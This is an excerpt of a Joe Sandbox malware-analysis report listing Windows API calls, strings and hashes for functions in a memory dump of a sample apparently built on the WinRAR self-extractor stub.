                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                    • API String ID: 667068680-1718035505
                                                                                                    • Opcode ID: c0ba8cfed6404b4e6edf0a3308cc17b7474fe4e4d7e0a6b3c36042d667462ff0
                                                                                                    • Instruction ID: 0d0b0f5f6225c6c4b798ecadbc5fa89beaa2ce259277a3f2deff7719a7b5a2cb
                                                                                                    • Opcode Fuzzy Hash: c0ba8cfed6404b4e6edf0a3308cc17b7474fe4e4d7e0a6b3c36042d667462ff0
                                                                                                    • Instruction Fuzzy Hash: 1AF0AF313B57229B4F719FB64C89D6B628CDA8135A371043ADF15D3280EA708889A3D4
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00934192
                                                                                                    • _wcslen.LIBCMT ref: 009341A3
                                                                                                    • _wcslen.LIBCMT ref: 009341B3
                                                                                                    • _wcslen.LIBCMT ref: 009341C1
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0092D2D3,?,?,00000000,?,?,?), ref: 009341DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareString
                                                                                                    • String ID: <
                                                                                                    • API String ID: 3397213944-4251816714
                                                                                                    • Opcode ID: 0a81cf2c214c11182997b848dca6e098b0e524f85402fce2cc0a7bf8f452ca7f
                                                                                                    • Instruction ID: 39b21aed2eebc5375d8eaacad86692ca2dbae543e0a7138c51d650a975917ede
                                                                                                    • Opcode Fuzzy Hash: 0a81cf2c214c11182997b848dca6e098b0e524f85402fce2cc0a7bf8f452ca7f
                                                                                                    • Instruction Fuzzy Hash: 42F03032148154BFCF121F91EC09DCE3F26EF91770B528415F6195A061CA32A9919BD1
                                                                                                    APIs
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009335E6
                                                                                                      • Part of subcall function 0092D076: GetVersionExW.KERNEL32(?), ref: 0092D0A7
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0093360A
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00933624
                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00933637
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00933647
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00933657
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2092733347-0
                                                                                                    • Opcode ID: 9239bb78d8515fc57d4dfd770f5722e45198b022f2ee51595910516417e06ee1
                                                                                                    • Instruction ID: 8b1e16dadb7ad37331a492f2702a783f496610e8fedc089bc825c82f5d6cf692
                                                                                                    • Opcode Fuzzy Hash: 9239bb78d8515fc57d4dfd770f5722e45198b022f2ee51595910516417e06ee1
                                                                                                    • Instruction Fuzzy Hash: E14148761183059FCB04DFA9C8859ABB7E8FF98714F44891EF999C7210E730D908CBA6
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00945111,00944ECC,009421B4), ref: 00945128
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00945136
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0094514F
                                                                                                    • SetLastError.KERNEL32(00000000,00945111,00944ECC,009421B4), ref: 009451A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: 95e084e95463e4165e0ce4d75de280e63bc64513c13216993e9470fa0b4d4250
                                                                                                    • Instruction ID: f3f508c01dd3f681c88d9a3b9d008e620aae98ef5d2be9230809f24fb4987fe6
                                                                                                    • Opcode Fuzzy Hash: 95e084e95463e4165e0ce4d75de280e63bc64513c13216993e9470fa0b4d4250
                                                                                                    • Instruction Fuzzy Hash: CC012B7212DF116FA7252BF5BC86F2B2B58EB86375BB1132DF110850E2EF919C50E244
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,009650C4,00946E12,009650C4,?,?,0094688D,?,?,009650C4), ref: 0094B9A9
                                                                                                    • _free.LIBCMT ref: 0094B9DC
                                                                                                    • _free.LIBCMT ref: 0094BA04
                                                                                                    • SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA11
                                                                                                    • SetLastError.KERNEL32(00000000,?,009650C4), ref: 0094BA1D
                                                                                                    • _abort.LIBCMT ref: 0094BA23
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 612bda44ce2547dd9a1a107d4d13a0f87b3f4f9c0df96c0337a9789a278e997f
                                                                                                    • Instruction ID: 568635275431ae471a64bbec2c780fa6f5f514f32f91da46024850435a3b326f
                                                                                                    • Opcode Fuzzy Hash: 612bda44ce2547dd9a1a107d4d13a0f87b3f4f9c0df96c0337a9789a278e997f
                                                                                                    • Instruction Fuzzy Hash: A4F0F636109A016BC656733AAD0AF6F25BDDFC1739F200514F615E72D2FF65CC02A260
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00940059
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00940073
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00940084
                                                                                                    • TranslateMessage.USER32(?), ref: 0094008E
                                                                                                    • DispatchMessageW.USER32(?), ref: 00940098
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 009400A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2148572870-0
                                                                                                    • Opcode ID: 1243d9b75efd3212e63fa7be2997c6c1474b24e4d45f227608224ef42f93a055
                                                                                                    • Instruction ID: c0446eb284c98dd11bce7b300be3529d174dc373745d561e5bff428b68df801e
                                                                                                    • Opcode Fuzzy Hash: 1243d9b75efd3212e63fa7be2997c6c1474b24e4d45f227608224ef42f93a055
                                                                                                    • Instruction Fuzzy Hash: 67F04F72A05229BBCB205FE2DC4CECFBF6DEF41751B108411F60AD2150D634C545DBA0
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0093D57B
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0093D591
                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0093D5B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$Dialog
                                                                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                    • API String ID: 1770891597-1315819833
                                                                                                    • Opcode ID: 923313fd29f87a99e3009ea5586d1026baf10e545c2e74e1bec635e94cc91474
                                                                                                    • Instruction ID: 20210fcf0f081ce50847ee67408b70a56ab7419711ecd53eba8015266fcb5455
                                                                                                    • Opcode Fuzzy Hash: 923313fd29f87a99e3009ea5586d1026baf10e545c2e74e1bec635e94cc91474
                                                                                                    • Instruction Fuzzy Hash: 5141B372A142086BEB30AB64DC49FFEB7ACEB88704F204429F605E7191DB74A9449F65
                                                                                                    APIs
                                                                                                      • Part of subcall function 00932663: _wcslen.LIBCMT ref: 00932669
                                                                                                      • Part of subcall function 0092D848: _wcsrchr.LIBVCRUNTIME ref: 0092D85F
                                                                                                    • _wcslen.LIBCMT ref: 0092E105
                                                                                                    • _wcslen.LIBCMT ref: 0092E14D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                    • API String ID: 3513545583-31770016
                                                                                                    • Opcode ID: b5ca4776be062029772f8d09fe3b666b7f2cd79a2553728313ce4d2e0ae21d75
                                                                                                    • Instruction ID: 633a55b3e236560103302074b235ed0e706169ac282698e3e459124c27331df2
                                                                                                    • Opcode Fuzzy Hash: b5ca4776be062029772f8d09fe3b666b7f2cd79a2553728313ce4d2e0ae21d75
                                                                                                    • Instruction Fuzzy Hash: F541233258877199C732AF30E8D6B3B77A8EF81748F10491EF8859B189E7A09D86C355
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0092DA59
                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0092BD19,?,?,00000800,?,?,?,0092BCD4), ref: 0092DB02
                                                                                                    • _wcslen.LIBCMT ref: 0092DB70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                    • String ID: UNC$\\?\
                                                                                                    • API String ID: 3341907918-253988292
                                                                                                    • Opcode ID: 9cc38688f49750cf941f56cef230bbd2132008fe89c57831a707dcb276438731
                                                                                                    • Instruction ID: 8ba3af7343581c1434ba6c0b0593f1042ed268a73e984996b062fb19b88a8dfa
                                                                                                    • Opcode Fuzzy Hash: 9cc38688f49750cf941f56cef230bbd2132008fe89c57831a707dcb276438731
                                                                                                    • Instruction Fuzzy Hash: 3341C4319053616AD620EB60AC82EFFB3BCAFD9744F01086EF9C493149E7A49C84C762
                                                                                                    APIs
                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0093D9ED
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0093DA12
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0093DA44
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0093DA67
                                                                                                      • Part of subcall function 0093C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0093DA3D,00000066), ref: 0093C665
                                                                                                      • Part of subcall function 0093C652: SizeofResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C67C
                                                                                                      • Part of subcall function 0093C652: LoadResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C693
                                                                                                      • Part of subcall function 0093C652: LockResource.KERNEL32(00000000,?,?,?,0093DA3D,00000066), ref: 0093C6A2
                                                                                                      • Part of subcall function 0093C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6BD
                                                                                                      • Part of subcall function 0093C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0093DA3D,00000066), ref: 0093C6CE
                                                                                                      • Part of subcall function 0093C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0093C737
                                                                                                      • Part of subcall function 0093C652: GlobalUnlock.KERNEL32(00000000), ref: 0093C756
                                                                                                      • Part of subcall function 0093C652: GlobalFree.KERNEL32(00000000), ref: 0093C75D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                                    • String ID: ]
                                                                                                    • API String ID: 1428510222-3352871620
                                                                                                    • Opcode ID: 71ad8417f1f4f49f07e777b6025d230baac4a20d5d9eef750f96bcfad5cc3caf
                                                                                                    • Instruction ID: cb3b4909521a736c1404c336bd17cda192add2672434097b89f6f859d7e07bbb
                                                                                                    • Opcode Fuzzy Hash: 71ad8417f1f4f49f07e777b6025d230baac4a20d5d9eef750f96bcfad5cc3caf
                                                                                                    • Instruction Fuzzy Hash: C501C072509A0166CB126BA4AD5AB7F7A7EABC2B51F240014F809B7391DF71DC05ABA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                      • Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0093F99B
                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0093F9B1
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0093F9C5
                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0093F9D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: RENAMEDLG
                                                                                                    • API String ID: 445417207-3299779563
                                                                                                    • Opcode ID: ddc32234cb38a5c3eee1a8d655d65de30ac2718c22f7de184e93ea7e2ee34a11
                                                                                                    • Instruction ID: b3ab0a2d5c4e99a8631a58ae5f7a3b21716e4f872e80456992b207def8af3789
                                                                                                    • Opcode Fuzzy Hash: ddc32234cb38a5c3eee1a8d655d65de30ac2718c22f7de184e93ea7e2ee34a11
                                                                                                    • Instruction Fuzzy Hash: 27014733A9C310BBD2118F689D0CF67BB5DFB59B02F208421F341A26D0C662DA049F75
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0094A676,?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002), ref: 0094A6E5
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0094A6F8
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0094A676,?,?,0094A616,?,0095F7B0,0000000C,0094A76D,?,00000002,00000000), ref: 0094A71B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: c6378d3afcd95f151b43d61e16d72b9625f81a0ddce2a0ef38a1d3cf55174f66
                                                                                                    • Instruction ID: 1c7120ac2b2c955cc8cdbebfd8d5f82b2252caedf9de04e408373df98751b697
                                                                                                    • Opcode Fuzzy Hash: c6378d3afcd95f151b43d61e16d72b9625f81a0ddce2a0ef38a1d3cf55174f66
                                                                                                    • Instruction Fuzzy Hash: B7F0AF30A55208FBDF109FA2DC49FAEBFB9EB48746F400169F805A72A0CB705D40DB81
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252061734-0
                                                                                                    • Opcode ID: ea2ddc88a10dda33baf9fc5c89bcc0c3ce3a15a3c5d8f91f1d173ec6199d30d4
                                                                                                    • Instruction ID: 7fe1433e34c4c0dbcd42278c194115ba4e634665e9b62db80db0071da4c8a08b
                                                                                                    • Opcode Fuzzy Hash: ea2ddc88a10dda33baf9fc5c89bcc0c3ce3a15a3c5d8f91f1d173ec6199d30d4
                                                                                                    • Instruction Fuzzy Hash: 2F51D272601A06EFDB29CF94D841F6EB3A8EF84750F16452EF81597292D7B1EC80CB90
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0094E589
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094E5AC
                                                                                                      • Part of subcall function 0094BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A24,?,0000015D,?,?,?,?,00947F00,000000FF,00000000,?,?), ref: 0094BCC0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0094E5D2
                                                                                                    • _free.LIBCMT ref: 0094E5E5
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0094E5F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
